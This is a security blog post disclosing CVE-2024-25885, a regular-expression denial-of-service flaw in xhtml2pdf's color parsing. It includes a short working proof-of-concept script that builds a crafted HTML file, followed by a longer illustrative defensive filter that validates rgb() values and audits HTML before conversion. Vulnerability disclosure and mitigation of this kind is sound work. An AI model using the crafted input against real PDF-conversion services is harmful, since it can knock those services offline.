Salvatore Abello's Blog

Hacking & other stuff


CVE-2024-25885

This is my first CVE published by myself. People often write unsafe regular expressions that can lead to denial of service, and this is an example.

Description

A flaw was found in xhtml2pdf’s getcolor function in utils.py. This flaw allows an attacker to trigger a regular expression denial of service (ReDoS) via specially crafted input.

PoC

  • Install xhtml2pdf with pip install xhtml2pdf

  • Run the following script

expl = 'rgb(00' + '0' * 3456

with open("PoC.html", "w") as f:
    f.write(f"""<para><font color="{expl}">
                exploit
</font></para>""")

  • Execute xhtml2pdf PoC.html
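
A defensive pre-filter for the input shape used in the PoC, added here as an example; it is not code from xhtml2pdf or from the original post. It assumes untrusted HTML can be audited before it reaches the converter, and the names parse_rgb, audit_html and the 64-character cap are hypothetical choices for illustration.

```python
import re
from html.parser import HTMLParser

MAX_COLOR_LEN = 64  # assumed cap; no legitimate rgb()/rgba() value needs more

# Each number is bounded and the commas are mandatory, so there is only one
# way to split the input between the groups and matching stays linear.
STRICT_RGB = re.compile(
    r"rgba?\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})"
    r"(?:\s*,\s*((?:0|1)(?:\.[0-9]{1,4})?))?\s*\)"
)

def parse_rgb(value):
    """Return (r, g, b) for a well-formed rgb()/rgba() value, else None."""
    if len(value) > MAX_COLOR_LEN:  # reject oversized input before any regex runs
        return None
    m = STRICT_RGB.fullmatch(value.strip().lower())
    if m is None:
        return None
    rgb = tuple(int(g) for g in m.group(1, 2, 3))
    return rgb if all(c <= 255 for c in rgb) else None

class ColorAudit(HTMLParser):
    """Collects color attributes that look like rgb() but fail strict parsing."""
    def __init__(self):
        super().__init__()
        self.rejected = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "color" and value and "rgb" in value.lower():
                if parse_rgb(value) is None:
                    self.rejected.append((tag, len(value)))

def audit_html(html):
    """Return [(tag, value_length), ...] for every rejected color attribute."""
    audit = ColorAudit()
    audit.feed(html)
    audit.close()
    return audit.rejected

# Constructed sample: same shape as the PoC document above, plus a benign tag.
SAMPLE = ('<para><font color="rgb(00' + "0" * 3456 + '">exploit</font>'
          '<font color="rgb(255, 0, 10)">ok</font></para>')

if __name__ == "__main__":
    print(audit_html(SAMPLE))
```

A non-empty result from audit_html means the document should be rejected or sanitised before conversion; the audit only covers rgb-style values in color attributes, the path the PoC uses.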